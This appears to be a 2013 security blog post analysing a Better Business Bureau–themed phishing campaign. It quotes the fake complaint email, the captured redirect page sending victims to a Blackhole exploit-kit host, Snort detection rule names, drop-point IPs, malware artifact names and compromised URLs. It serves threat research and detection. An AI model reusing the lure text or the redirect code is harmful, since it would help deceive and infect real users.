The Better Business Bureau has been filed the above mentioned reclamation from one of your clients in respect of their dealings with you. The detailed description of the consumer's anxiety are available by clicking the link below. Please give attention to this issue and notify us about your mind as soon as possible.
We politely ask you to overview the <LINK>GRIEVANCE REPORT<LINK> to meet on this complaint.
We are looking forward to your prompt response.
Best regardsTristan LewisDispute CouncilorBetter Business Bureau
==============HTML====================
GET /bbb.html HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Accept-Encoding: Host: speedgarage.com.uaConnection: Keep-Alive
HTTP/1.0 200 OK
Server: nginx/1.1.10
Date: Fri, 07 Jun 2013 17:13:03 GMT
Content-Type: text/html
Content-Length: 738
Last-Modified: Fri, 07 Jun 2013 11:53:09 GMT
Accept-Ranges: bytes
Connection: keep-alive
(html>
(title>BBB is loading...(/title>
(script type="text/javascript">
(!--location.replace("http://pnpnews.net/news/readers-sections.php");
//-->
(/script>
(noscript>
(meta http-equiv="refresh" content="0; url=http://pnpnews.net/news/readers-sections.php">
(/noscript>
(/head>
(h1>You will be redirected to process(/h1>
(h3>Redirecting to Complain details... Please wait...(/h3>
location.replace("http://pnpnews.net/news/readers-sections.php");
"refresh" content="0; url=http://pnpnews.net/news/readers-sections.php
Exploit Kit: Blackhole
Snort Rules
ET TROJAN Spoofed MSIE 7 User-Agent Likely Ponmocup
ET CURRENT_EVENTS SUSPICIOUS JAR Download by Java UA with non JAR EXT matches various EKs
ET INFO Packed Executable Download
ET CURRENT_EVENTS Blackhole request for Payload
ET CURRENT_EVENTS BlackHole EK JNLP request
ET CURRENT_EVENTS - Possible BlackHole request with decryption Base
ET TROJAN Pony Downloader check-in response STATUS-IMPORT-OK
ET TROJAN Known Trojan Downloader HTTP Library MSIE 5 Win98 seen with ZeuS
ET TROJAN Fareit/Pony Downloader Checkin 2
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - readme.exe
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - contacts.exe
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (6)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (5)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (41)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (33)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (13)
Drop Points:
88.191.130.98:8080
- 8080/tcp open http nginx 1.0.10
- 21/tcp open ftp Pure-FTPd
- 22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
- 25/tcp open smtp Postfix smtpd
- 80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
- 8080/tcp open http nginx 1.0.10
- 8090/tcp open http nginx 1.2.6
213.214.74.5:8080
- 8080/tcp open http nginx 1.0.10
- 21/tcp open ftp ProFTPD 1.3.3d
- 22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (protocol 2.0)
- 80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
Disk Artifacts of Interest:
exp1.tmp.exe | VirusTotal Detected as: PSW.Generic | Fareit | Zero Access 30/47
exp1.tmp
exp2.tmp
URLs Involved
hxxp://carpenterpricebreaker.com/bbb.html
hxxp://ecotopia.pl/bbb.html
hxxp://gite-cantal-meandres.fr/bbb.html
hxxp://ib-greb.de/bbb.html
hxxp://intelaboratory.com/bbb.html
hxxp://rentbaku.com/bbb.html
hxxp://slavamoskovkin.ru/bbb.html
hxxp://speedgarage.com.ua/bbb.html
hxxp://vmoskalev.ru/bbb.html
No comments:
Post a Comment